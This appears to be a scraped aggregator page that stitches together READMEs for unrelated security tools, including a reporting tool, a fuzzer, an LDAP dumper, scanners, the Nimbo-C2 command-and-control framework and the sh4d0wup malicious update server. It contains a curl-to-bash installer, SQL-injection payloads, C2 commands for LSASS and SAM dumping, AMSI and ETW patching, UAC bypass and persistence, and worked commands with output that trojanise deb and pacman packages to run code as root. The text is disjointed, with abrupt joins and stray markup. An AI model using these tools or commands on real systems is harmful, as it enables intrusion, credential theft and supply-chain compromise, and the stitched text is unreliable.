SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!
You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:
You prefer self-hosting? That's fine! You will need:
You can then install SysReptor with via script:
curl -s https://docs.sysreptor.com/install.sh | bash
After successful installation, access your application at http://localhost:8000/.
Get detailed installation instructions at Installation.
msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.
Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.
Serial No. | Tool Name | Serial No. | Tool Name | |
---|---|---|---|---|
1 | whatweb | 2 | nmap | |
3 | golismero | 4 | host | |
5 | wget | 6 | uniscan | |
7 | wafw00f | 8 | dirb | |
9 | davtest | 10 | theharvester | |
11 | xsser | 12 | fierce | |
13 | dnswalk | 14 | dnsrecon | |
15 | dnsenum | 16 | dnsmap | |
17 | dmitry | 18 | nikto | |
19 | whois | 20 | lbd | |
21 | wapiti | 22 | devtest | |
23 | sslyze |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attackerβs control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.
Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.
Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.
CVSS V3 SCORE RANGE SEVERITY IN ADVISORY 0.1 - 3.9 Low 4.0 - 6.9 Medium 7.0 - 8.9 High 9.0 - 10.0 Critical
Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan | |
---|---|---|---|---|
1 | IPv6 | 2 | Wordpress | |
3 | SiteMap/Robot.txt | 4 | Firewall | |
5 | Slowloris Denial of Service | 6 | HEARTBLEED | |
7 | POODLE | 8 | OpenSSL CCS Injection | |
9 | FREAK | 10 | Firewall | |
11 | LOGJAM | 12 | FTP Service | |
13 | STUXNET | 14 | Telnet Service | |
15 | LOG4j | 16 | Stress Tests | |
17 | WebDAV | 18 | LFI, RFI or RCE. | |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present | |
21 | Shellshock Bug | 22 | Leaks Internal IP | |
23 | HTTP PUT DEL Methods | 24 | MS10-070 | |
25 | Outdated | 26 | CGI Directories | |
27 | Interesting Files | 28 | Injectable Paths | |
29 | Subdomains | 30 | MS-SQL DB Service | |
31 | ORACLE DB Service | 32 | MySQL DB Service | |
33 | RDP Server over UDP and TCP | 34 | SNMP Service | |
35 | Elmah | 36 | SMB Ports over TCP and UDP | |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions , Feature Requests and Bug Reports are more than welcome.
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.
Note:
Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.
Β
go install -v github.com/Brum3ns/firefly/cmd/firefly@latest
If the above install method do not work try the following:
git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h
firefly -h
firefly -u 'http://example.com/?query=FUZZ'
Different types of request input that can be used
Basic
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000
Request with different methods and protocols
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly
firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'
This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.
firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ
B=2&C=3' -au replace
Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)
firefly -u 'http://example.com/?query=FUZZ' -e
Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.
Display the format of all payloads and exit
firefly -show-payload
List of all Tampers avalible
firefly -list-tamper
Tamper all paylodas with given type (More than one can be used separated by comma)
firefly -u 'http://example.com/?query=FUZZ' -e s2c
firefly -u 'http://example.com/?query=FUZZ' -e hex
Hex then URL encode all payloads
firefly -u 'http://example.com/?query=FUZZ' -e hex,url
firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'
The Payloads:
' or (1=1)-- -
and" or(20=20)or "
Will result in:' or (13=(37-24))-- -
and" or(13=(37-24))or "
Where the=>
(with spaces) inducate the "replace to".
Filter options to filter/match requests that include a given rule.
Filter response to ignore (filter) status code 302
and line count 0
firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0
Filter responses to include (match) regex
, and status code 200
firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200
Preformance and time delays to use for the request process
Threads / Concurrency
firefly -u 'http://example.com/?query=FUZZ' -t 35
Time Delay in millisecounds (ms) for each Concurrency
FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000
Wordlist that contains the paylaods can be added separatly or extracted from a given folder
Single Wordlist with its attack type
firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz
Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt
firefly -u 'http://example.com/?query=FUZZ' -w wl/
Example
Wordlists names inside folder
wl
:
- fuzz_wordlist.txt
- time_wordlist.txt
JSON output is strongly recommended. This is because you can benefit from the
jq
tool to navigate throw the result and compare it.
(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)
Simple plaintext output format
firefly -u 'http://example.com/?query=FUZZ' -o file.txt
JSON output format (recommended)
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json
Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!
The changelog highlights over the last few weeks since Marchβs release of 2023.1 is:
Nimbo-C2 is yet another (simple and lightweight) C2 framework.
Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.
All server components are written in Python:
My work wouldn't be possible without the previous great work done by others, listed under credits.
UPX0
, UPX1
) to make detection and unpacking harder.config.jsonc
).cd
ingit clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
docker build -t nimbo-dependencies .
cd
again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc
, download and upload files from agents, etc.). For Linux replace ${pwd}
with $(pwd)
.cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies
First, edit config.jsonc
for your needs.
Then run with: python3 Nimbo-C2.py
Use the help
command for each screen, and tab completion.
Also, check the examples directory.
Nimbo-C2 > help
--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data
--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)
--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status
--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
</ div> Nimbo-2 [d337c406] > help
--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command
--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)
--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software
--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio
--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function
--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process
--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)
--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique
--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface
--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)
--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
Nimbo-2 [51a33cb9] > help
--== Send Commands ==--
cmd <shell-command> -> execute a terminal command
--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)
--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)
--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)
--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
assembly
command, make sure your assembly doesn't call any exit function because it will kill the agent.shellc
command may unexpectedly crash or change the injected process behavior, test the shellcode and the target process first.audio
, lsass
and sam
commands temporarily save artifacts to disk before exfiltrate and delete them.persist
commands should be done manually.uac
commands. die
flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), keep
should leave you with 2 active agents probing the C2, then you should manually kill the unelevated.msgbox
is blocking, until the user will press the ok button.This software may be buggy or unstable in some use cases as it not being fully and constantly tested. Feel free to open issues, PR's, and contact me for any reason at (Gmail | Linkedin | Twitter).
Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called consumer, but triggers unexpected behavior in deeper program logic. This allows to even fuzz targets that utilize cryptography primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.
For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments
submodule documentation after reading this document.
Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.
Β
# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# donwloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh
# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh
# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env /start.sh
# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh
# Runninge start.sh the second time will automatically build the fuzzer.
# See `Fuzzing a Target using Fuzztruction` below for further instructions.
Fuzztruction contains the following core components:
The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler
directory.
The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.
The implementation of the generator can be found in the generator
directory. It consists of two components that are explained in the following.
The compiler pass (generator/pass
) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm
repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.
The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs
, which we also published on crates.io.
During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.
The agent, implemented in generator/agent
is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.
The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.
Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
The Fuzztruction runtime environment can be built by executing env/build.sh
. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm
directory.
In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh
.
The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments
submodule.
After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzers environment lifecycle is managed by a set of scripts located in the env
folder.
Script | Description |
---|---|
./env/start.sh | Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first. |
./env/stop.sh | This stops the container. Remember to call this after rebuilding the image. |
Using start.sh
, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.
Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.
This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user
and has passwordless sudo
access per default.
Permissions: The Docker images' user is named
user
and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.
Inside the container, the following paths are (bind) mounted from the host:
Container Path | Host Path | Note |
---|---|---|
/home/user/fuzztruction | ./ | Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host. |
/home/user/shared | ./ | Used to exchange data with the host. |
/home/user/.zshrc | ./data/zshrc | - |
/home/user/.zsh_history | ./data/zsh_history | - |
/home/user/.bash_history | ./data/bash_history | - |
/home/user/.config/nvim/init.vim | ./data/init.vim | - |
/home/user/.config/Code | ./data/vscode-data | Used to persist Visual Studio Code config between container restarts. |
/ssh-agent | $SSH_AUTH_SOCK | Allows using the SSH-Agent inside the container if it runs on the host. |
/home/user/.gitconfig | /home/$USER/.gitconfig | Use gitconfig from the host, if there is any config. |
/ccache | ./data/ccache | Used to persist ccache cache between container restarts. |
After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh
, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.
For building Fuzztruction, it is sufficient to call cargo build
in /home/user/fuzztruction
. This will build all components described in the Components section. The most interesting build artifacts are the following:
Artifacts | Description |
---|---|
./generator/pass/fuzztruction-source-llvm-pass.so | The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf ; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell. |
./generator/pass/fuzztruction-source-clang-fast | A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main. |
./target/debug/libgenerator_agent.so | The agent the is injected into the generator application. |
./target/debug/fuzztruction | The fuzztruction binary representing the actual fuzzer. |
We will use libpng
as an example to showcase Fuzztruction's capabilities. Since libpng
is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the building process may take up to several hours for building the AFL++ binary because of the collision free coverage map encoding feature and compare splitting.
Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/
directory and execute ./build.sh libpng
. This will pull the source and start the build according to the steps defined in libpng/config.sh
.
Using the following command
sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml --purge --show-output benchmark -i 100
allows testing whether the target works. Each target is defined using a YAML
configuration file. The files are located in the configurations
directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml
file is extensively documented.
If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.
--show-output
to fuzztruction
allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.env
section of the sink
in the YAML
config can give you a more detailed output regarding the consumer.LD_PRELOAD
, double check the provided paths.To start the fuzzing process, executing the following command is sufficient:
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m
This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory
attribute in the target's config file. In case of pngtopng
, the default location is /tmp/pngtopng-pngtopng
.
If the working directory already exists, --purge
must be passed as an argument to fuzztruction
to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz
or benchmark
.
For running AFL++ alongside Fuzztruction, the aflpp
subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m
for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting
folder in the working directory. In case AFL++ should be executed independently but based on the same .yml
configuration file, the --suffix
argument can be used to append a suffix to the working directory of the spawned fuzzer.
After the fuzzing run is terminated, the tracer
subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces
subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.
The coverage
tool located at ./target/debug/coverage
can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp
in case of the previous example). Executing ./target/debug/coverage /tmp
will generate a .csv
file that maps time to the number of covered basic blocks and a .json
file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completion s Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information
Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.
sh4d0wup
is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots
that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors
so it matches only if eg. the user-agent matches a pattern or if the client is connecting from a specific ip address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.
Some plots are more complex to run than others, to avoid long startup time due to downloads and artifact patching, you can build a plot in advance. This also allows to create signatures in advance.
sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst
This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.
sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst
You can find examples here:
contrib/plot-archlinux.yaml
contrib/plot-debian.yaml
contrib/plot-rustup.yaml
contrib/plot-curl-sh.yaml
sh4d0wup infect elf
% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Intera ct with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information
sh4d0wup infect pacman
% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflic ts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk
sh4d0wup infect deb
% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: de laying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
sh4d0wup infect oci
Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix
and then inserts the new commit back into the repository on your local computer:
% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin
This may take some time, eventually it shows a commit id that you can use to create a new branch:
git show 777754fde8...
git branch some-name 777754fde8...
CIS Benchmark testing of Windows SIEM configuration
This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:
Further details on usage and other background info is at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/
How it works β’ Installation β’ Usage β’ MODES β’ For Developers β’ Credits
Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.
SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.
In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.
SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3
[Thanks ChatGPT for the Description]
This tool mainly performs 3 tasks
SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-
git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh
scriptkiddi3 -h
This will display help for the tool. Here are all the switches it supports.
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.
[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode
Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER
[FLAGS:]
[TARGET:] -d, --domain target domain to scan
[CONFIG:] -c, --config path of your configuration file for subfinder
[HELP:] -h, --help to get help menu
